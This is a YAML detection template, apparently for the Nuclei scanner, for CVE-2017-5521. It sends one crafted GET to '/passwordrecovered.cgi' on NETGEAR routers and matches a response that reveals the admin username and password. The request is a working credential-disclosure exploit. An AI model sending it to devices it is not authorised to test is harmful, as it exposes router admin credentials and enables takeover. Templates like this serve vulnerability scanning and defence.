id: CVE-2017-5521

info:
  name: Bypassing Authentication on NETGEAR Routers
  author: princechaddha
  severity: high
  description: An issue was discovered on NETGEAR R8500, R8300, R7000, R6400, R7300, R7100LG, R6300v2, WNDR3400v3, WNR3500Lv2, R6250, R6700, R6900, and R8000 devices.They are prone to password disclosure via simple crafted requests to the web management server.
  reference:
    - https://www.cvedetails.com/cve/CVE-2017-5521/
    - https://www.trustwave.com/en-us/resources/blogs/spiderlabs-blog/cve-2017-5521-bypassing-authentication-on-netgear-routers/
  classification:
    cvss-metrics: CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 8.1
    cve-id: CVE-2017-5521
    cwe-id: CWE-200
  tags: cve,cve2017,auth-bypass,netgear

requests:
  - method: GET
    path:
      - "{{BaseURL}}/passwordrecovered.cgi?id=nuclei"

    matchers-condition: and
    matchers:
      - type: word
        words:
          - "right\">Router\\s*Admin\\s*Username<"
          - "right\">Router\\s*Admin\\s*Password<"
        condition: and
        part: body
      - type: status
        status:
          - 200